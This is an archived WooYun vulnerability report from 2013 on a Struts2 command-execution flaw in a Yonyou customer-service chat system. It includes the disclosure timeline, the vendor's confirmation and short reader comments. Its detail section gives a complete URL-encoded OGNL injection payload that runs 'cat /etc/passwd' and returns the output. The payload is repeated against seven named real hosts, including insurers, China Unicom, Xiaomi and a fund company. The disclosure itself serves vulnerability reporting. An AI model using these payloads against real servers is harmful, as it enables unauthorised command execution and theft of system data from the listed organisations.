当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-031383

漏洞标题:用友某产品Struts命令执行漏洞(可导致金融、保险、基金等行业用户受到影响)

相关厂商:用友软件

漏洞作者: Finger

提交时间:2013-07-19 19:21

修复时间:2013-10-17 19:22

公开时间:2013-10-17 19:22

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-19: 细节已通知厂商并且等待厂商处理中
2013-07-22: 厂商已经确认,细节仅向厂商公开
2013-07-25: 细节向第三方安全合作伙伴开放
2013-09-15: 细节向核心白帽子及相关领域专家公开
2013-09-25: 细节向普通白帽子公开
2013-10-05: 细节向实习白帽子公开
2013-10-17: 细节向公众公开

简要描述:

用友客服系统某产品命令执行漏洞(涉及金融、保险、基金等行业用户)

详细说明:

用友的客服系统存在最新的struts命令执行漏洞 涉及金融、保险、基金等行业用户
中国大地保险

http://im.95590.cn:7002/web/icc/chat/chat?redirectAction:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}


中国人保财险

http://im.e-picc.com.cn/web/icc/chat/chat?redirectAction:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}


中国联通

http://help.10010.com/web/icc/chat/chat?redirectAction:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}


华泰柏瑞基金

http://online.huatai-pb.com:7009/web/ucc/chat/chat?redirectAction:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}


国美电器

http://onlinechat.gome.com.cn/web/icc/chat/chat?redirectAction:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}


小米手机

http://online.kefu.xiaomi.com/web/icc/chat/chat?redirectAction:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}


江西中小企业公共服务平台网络

http://111.75.198.122/web/icc/chat/chat?redirectAction:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}

漏洞证明:

QQ截图20130719191429.jpg

QQ截图20130719191851.jpg

修复方案:

版权声明:转载请注明来源 Finger@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-07-22 08:18

厂商回复:

此问题正在修复,非常感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-19 19:23 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  2. 2013-07-19 19:25 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

    mark

  3. 2013-07-19 20:00 | 党中央 ( 路人 | Rank:24 漏洞数:4 | 中国共产党全国代表大会产生的中央权力机构...)

    kraM

  4. 2013-07-19 20:11 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

    @党中央 你又跑出来捣乱,抓起来关到笼子去。

  5. 2013-07-19 20:56 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    呵呵

  6. 2013-07-19 22:04 | Hilbert ( 路人 | Rank:5 漏洞数:1 | 今晚打老虎)

    mark

  7. 2013-07-20 00:12 | 小色 ( 路人 | Rank:0 漏洞数:1 | 撸的一手好管)

    mark

  8. 2013-07-20 00:59 | Slcio ( 实习白帽子 | Rank:74 漏洞数:13 | 白帽)

    不用mark了。。。Struts2的产品。。。比如小米某。。。

  9. 2013-07-30 17:39 | solar-fly ( 路人 | Rank:17 漏洞数:3 | I am fly , so I can fly !)

    mark

  10. 2013-10-17 20:56 | 小权 ( 路人 | Rank:4 漏洞数:3 | 小菜鸟,求各位大姐大哥多多指教)

    mark